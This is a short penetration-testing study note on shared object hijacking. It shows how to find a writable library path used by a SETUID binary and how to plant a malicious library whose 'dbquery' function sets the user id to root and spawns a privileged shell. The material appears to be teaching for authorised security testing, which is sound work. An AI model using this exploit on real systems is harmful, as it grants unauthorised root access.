Shared Object Hijacking

• Programs and binaries under development usually have custom libraries associated with them.
• Consider the following SETUID binary:
  • payroll
• find the shared objects/libraries required by the binary
  • ldd payroll
  • we see that one dependency is non-standard
• inspect the dependency
  • readelf -d payroll | grep PATH
• check access to the folder the above dependency belongs to
  • we have write access
• find the function name called by the binary payroll
  • ldd payroll
  • cp /lib/x86_64-linux-gnu/libc.so.6 /development/libshared.so
    • overwrite another library to the development folder
  • ./payroll
    • ./payroll: symbol lookup error: ./payroll: undefined symbol: dbquery
    • now we know that dbquery function is missing
• compile the below code

  #include<stdio.h>
  #include<stdlib.h>
  #include<unistd.h>
  
  void dbquery() {
      printf("Malicious library loaded\n");
      setuid(0);
      system("/bin/sh -p");
  } 
  

• The dbquery function sets our user id to 0 (root) and executing /bin/sh when called.
• Compile it using GCC.
  • gcc src.c -fPIC -shared -o /development/libshared.so
• ./payroll
  • get root